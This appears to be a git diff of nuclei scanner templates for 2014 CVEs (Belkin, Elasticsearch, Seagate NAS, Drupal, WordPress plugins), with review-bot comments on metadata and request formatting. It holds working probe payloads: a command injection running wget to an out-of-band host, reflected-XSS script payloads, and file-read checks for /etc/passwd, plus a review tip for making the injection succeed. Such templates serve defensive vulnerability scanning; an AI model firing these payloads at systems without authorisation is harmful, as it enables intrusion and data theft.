@@ -1,12 +1,19 @@ id: CVE-2014-2962 info: - name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal + name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal author: daffainfo severity: high - description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. - reference: https://www.exploit-db.com/exploits/38488 - tags: cve,cve2014,lfi,router + description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + reference: + - https://www.kb.cert.org/vuls/id/774788 + - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l + - http://www.kb.cert.org/vuls/id/774788 + - http://www.belkin.com/us/support-article?articleNum=109400 + remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. + classification: + cve-id: CVE-2014-2962 + tags: cve,cve2014,lfi,router,firmware,traversal requests: - method: GET @@ -18,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/cves/2014/CVE-2014-3120.yaml b/cves/2014/CVE-2014-3120.yaml index a2bd566a60..437057bc90 100644 --- a/cves/2014/CVE-2014-3120.yaml +++ b/cves/2014/CVE-2014-3120.yaml 
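Review bot: The NVD link added under `reference:` has a stray trailing character, `https://nvd.nist.gov/vuln/detail/CVE-2014-2962l`, and will not resolve; it should be `- https://nvd.nist.gov/vuln/detail/CVE-2014-2962`. The CERT advisory is also listed twice (https and http forms of `kb.cert.org/vuls/id/774788`); keep one. The added `remediation:` describes a firewall workaround rather than a fix; the description says firmware before 1.00.08 is affected while `name:` lists 1.00.08/1.00.09 as vulnerable, so confirm the fixed version against the Belkin article and state an upgrade target, keeping the port-80 restriction as a mitigation.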
@@ -5,11 +5,15 @@ info: author: pikpikcu severity: critical description: | - The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. + The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - https://www.elastic.co/blog/logstash-1-4-3-released - tags: cve,cve2014,elastic,rce + - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 + - http://bouk.co/blog/elasticsearch-rce/ + classification: + cve-id: CVE-2014-3120 + tags: cve,cve2014,elastic,rce,elasticsearch requests: - raw: @@ -46,9 +50,11 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-3206.yaml b/cves/2014/CVE-2014-3206.yaml new file mode 100644 index 0000000000..93e697d674 --- /dev/null +++ b/cves/2014/CVE-2014-3206.yaml 
@@ -0,0 +1,38 @@ +id: CVE-2014-3206 + +info: + name: Seagate BlackArmor NAS - Command Injection + author: gy741 + severity: critical + description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 + - https://www.exploit-db.com/exploits/33159 + - https://www.exploit-db.com/exploits/33159/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-3206 + cwe-id: CWE-20 + tags: cve,cve2014,seagate,rce + +requests: + - raw: + - | + GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + unsafe: true + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-3704.yaml b/cves/2014/CVE-2014-3704.yaml index 883f72ee3c..8fc7a922aa 100644 --- a/cves/2014/CVE-2014-3704.yaml +++ b/cves/2014/CVE-2014-3704.yaml 
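Review bot: Both raw requests put literal spaces inside the request line (`GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1`), and `unsafe: true` makes nuclei send them byte-for-byte; an HTTP parser that splits the request line on whitespace sees the target as `...?session=fail;wget` and `http://...;` as the version, so the `wget` is unlikely to reach the injected parameter on a compliant server. Encode the spaces in the query string (`%20`, or `${IFS}` if the target shell honours it), after which `unsafe: true` is no longer needed. The reference list repeats exploit-db 33159 with and without a trailing slash. The description names both `backupmgt` and `backupmgmt` directories while both requests use `backupmgt`; worth confirming against the advisory which path pre_connect_check.php lives under.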
@@ -1,15 +1,21 @@ id: CVE-2014-3704 + info: - name: Drupal Sql Injetion + name: Drupal SQL Injection author: princechaddha severity: high - description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys. + description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys. reference: + - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql + - https://nvd.nist.gov/vuln/detail/CVE-2014-3704 - https://www.drupal.org/SA-CORE-2014-005 - - http://www.exploit-db.com/exploits/34984 - - http://www.exploit-db.com/exploits/34992 - - http://www.exploit-db.com/exploits/34993 - - http://www.exploit-db.com/exploits/35150 + - https://www.exploit-db.com/exploits/34984 + - https://www.exploit-db.com/exploits/34992 + - https://www.exploit-db.com/exploits/34993 + - https://www.exploit-db.com/exploits/35150 + remediation: Upgrade to Drupal core 7.32 or later. + classification: + cve-id: CVE-2014-3704 tags: cve,cve2014,drupal,sqli requests: @@ -30,3 +36,5 @@ requests: - "e807f1fcf82d132f9bb018ca6738a19f" condition: and part: body + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml index b593394d70..7ea04e9257 100644 --- a/cves/2014/CVE-2014-3744.yaml +++ b/cves/2014/CVE-2014-3744.yaml 
@@ -3,17 +3,19 @@ id: CVE-2014-3744 info: name: Node.js st module Directory Traversal author: geeknik - description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. + severity: high + description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-3744 - https://github.com/advisories/GHSA-69rr-wvh9-6c4q - https://snyk.io/vuln/npm:st:20140206 - severity: high - tags: cve,cve2014,lfi,nodejs,st + - https://nodesecurity.io/advisories/st_directory_traversal classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2014-3744 cwe-id: CWE-22 + tags: cve,cve2014,lfi,nodejs,st requests: - method: GET @@ -28,3 +30,5 @@ requests: - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index 96c90f1486..542304e727 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml 
@@ -4,11 +4,15 @@ info: name: Weblogic SSRF in SearchPublicRegistries.jsp author: princechaddha severity: medium - tags: cve,cve2014,weblogic,oracle,ssrf,oast + description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services. reference: + - https://www.oracle.com/security-alerts/cpujul2014.html - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html - description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services." + - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html + classification: + cve-id: CVE-2014-4210 + tags: cve,cve2014,weblogic,oracle,ssrf,oast requests: - method: GET @@ -22,6 +26,8 @@ requests: - 200 - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4513.yaml b/cves/2014/CVE-2014-4513.yaml index 2661d56866..4ddd6f9c7a 100644 --- a/cves/2014/CVE-2014-4513.yaml +++ b/cves/2014/CVE-2014-4513.yaml 
@@ -1,11 +1,15 @@ id: CVE-2014-4513 info: - name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS) + name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513 + description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-4513 + - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss + classification: + cve-id: CVE-2014-4513 tags: cve,cve2014,wordpress,xss,wp-plugin requests: @@ -28,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml index 8e6d8424d8..23d27ce4bf 100644 --- a/cves/2014/CVE-2014-4535.yaml +++ b/cves/2014/CVE-2014-4535.yaml 
@@ -1,24 +1,25 @@ id: CVE-2014-4535 info: - name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium + description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. reference: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4535 cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml index d226a920db..b2485663df 100644 --- a/cves/2014/CVE-2014-4536.yaml +++ b/cves/2014/CVE-2014-4536.yaml 
@@ -1,19 +1,21 @@ id: CVE-2014-4536 info: - name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS + name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium + description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. reference: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://wordpress.org/plugins/infusionsoft/changelog + - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4536 cwe-id: CWE-79 - description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET @@ -35,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4539.yaml b/cves/2014/CVE-2014-4539.yaml index e990363423..8db0320e57 100644 --- a/cves/2014/CVE-2014-4539.yaml +++ b/cves/2014/CVE-2014-4539.yaml 
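Review bot: The new `name` and `description` disagree on the fixed version: the title says `< 1.5.7` while the description says the plugin `before 1.5.6` is affected, and a reader of the finding cannot tell which to trust. Reconcile the two against the wordpress.org changelog reference added in this same hunk, e.g. `name: Infusionsoft Gravity Forms Add-on < 1.5.6 - Unauthenticated Reflected Cross-Site Scripting` if the description's NVD wording turns out to be the authoritative one. The request path and matchers lie outside this hunk.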
@@ -1,19 +1,20 @@ id: CVE-2014-4539 info: - name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) + name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: | + description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + reference: - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304 - https://nvd.nist.gov/vuln/detail/CVE-2014-4539 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-movies-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4539 cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET @@ -34,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml index 9db25c6960..df4e9ea1b5 100644 --- a/cves/2014/CVE-2014-4544.yaml +++ b/cves/2014/CVE-2014-4544.yaml 
@@ -1,24 +1,25 @@ id: CVE-2014-4544 info: - name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS + name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. + description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability. reference: - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4544 cwe-id: CWE-79 + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" + - "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" matchers-condition: and matchers: @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4550.yaml b/cves/2014/CVE-2014-4550.yaml index 898d13a6bd..481cf4dd1d 100644 --- a/cves/2014/CVE-2014-4550.yaml +++ b/cves/2014/CVE-2014-4550.yaml 
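Review bot: The description still reads `The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.`, naming neither the vulnerable script nor the parameter, while the sibling templates in this commit spell both out; the request in the same hunk targets `getid3/demos/demo.write.php` via `Filename`, so something like `description: A cross-site scripting vulnerability in getid3/demos/demo.write.php in the Podcast Channels plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the Filename parameter.` would be consistent — confirm the affected-version range against the NVD reference before adding it. The trailing `&` on the path is harmless but can be dropped.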
@@ -1,24 +1,25 @@ id: CVE-2014-4550 info: - name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS + name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: | + description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter. + reference: - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-shortcode-ninja-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4550 cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter." + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" + - "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" matchers-condition: and matchers: @@ -34,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4558.yaml b/cves/2014/CVE-2014-4558.yaml index 38f4f31020..8cd16f4e7b 100644 --- a/cves/2014/CVE-2014-4558.yaml +++ b/cves/2014/CVE-2014-4558.yaml 
@@ -1,24 +1,25 @@ id: CVE-2014-4558 info: - name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS + name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: | + description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter. + reference: - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4558 cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter." + tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " + - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " matchers-condition: and matchers: @@ -34,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4561.yaml b/cves/2014/CVE-2014-4561.yaml index 257dd609d7..bac48b3878 100644 --- a/cves/2014/CVE-2014-4561.yaml +++ b/cves/2014/CVE-2014-4561.yaml 
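Review bot: The rewritten path on the new side still ends with a space inside the quotes (`…%3C/script%3E "`), so that space becomes part of the request-target; drop it: `- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E"`. Whether nuclei sends it raw (a strict server may answer 400, and the `status: 200` matcher then silently misses a vulnerable host) or encodes it as `%20` (the reflected string gains a trailing space), it is not part of the payload and only adds noise. The matchers are outside this hunk.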
@@ -1,24 +1,25 @@ id: CVE-2014-4561 info: - name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS + name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: | + description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. + reference: - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-ultimate-weather-plugin-a3-cross-site-scripting-xss/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4561 cwe-id: CWE-79 - description: "The ultimate-weather plugin 1.0 for WordPress has XSS" + tags: cve,cve2014,wordpress,wp-plugin,xss,weather requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: @@ -34,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4592.yaml b/cves/2014/CVE-2014-4592.yaml index db868347e2..c2521e5d30 100644 --- a/cves/2014/CVE-2014-4592.yaml +++ b/cves/2014/CVE-2014-4592.yaml 
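Review bot: The new description `The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.` names neither the vulnerable script nor the parameter, although the request in the same hunk targets `magpierss/scripts/magpie_debug.php` via `url`; e.g. `description: A cross-site scripting vulnerability in magpierss/scripts/magpie_debug.php in the Ultimate Weather plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.` — check the codevigilant reference for the affected-version wording before adopting it. The matchers are outside this hunk.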
@@ -1,24 +1,25 @@ id: CVE-2014-4592 info: - name: WP Planet <= 0.1 - Unauthenticated Reflected XSS + name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: | + description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter. + reference: - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 - tags: cve,cve2014,wordpress,wp-plugin,xss + - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2014-4592 cwe-id: CWE-79 - description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter." + tags: cve,cve2014,wordpress,wp-plugin,xss requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: @@ -34,4 +35,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-4940.yaml b/cves/2014/CVE-2014-4940.yaml index a2d4666d76..13f17a9af9 100644 --- a/cves/2014/CVE-2014-4940.yaml +++ b/cves/2014/CVE-2014-4940.yaml 
@@ -5,7 +5,12 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. - reference: https://www.cvedetails.com/cve/CVE-2014-4940 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= + - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/ + classification: + cve-id: CVE-2014-4940 tags: cve,cve2014,wordpress,wp-plugin,lfi requests: @@ -18,8 +23,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-5111.yaml b/cves/2014/CVE-2014-5111.yaml index f525a4441f..f8a4d0004a 100644 --- a/cves/2014/CVE-2014-5111.yaml +++ b/cves/2014/CVE-2014-5111.yaml @@ -5,10 +5,13 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. - reference: | + reference: - https://www.exploit-db.com/exploits/39351 - - https://www.cvedetails.com/cve/CVE-2014-5111 - tags: cve,cve2014,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2014-5111 + - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html + classification: + cve-id: CVE-2014-5111 + tags: cve,cve2014,lfi,trixbox requests: - method: GET 
@@ -20,8 +23,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/cves/2014/CVE-2014-5258.yaml b/cves/2014/CVE-2014-5258.yaml index 70144e35a4..78a3979930 100644 --- a/cves/2014/CVE-2014-5258.yaml +++ b/cves/2014/CVE-2014-5258.yaml @@ -4,10 +4,14 @@ info: name: webEdition 6.3.8.0 - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. + description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-5258 - https://www.exploit-db.com/exploits/34761 - - https://www.cvedetails.com/cve/CVE-2014-5258 + - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html + - 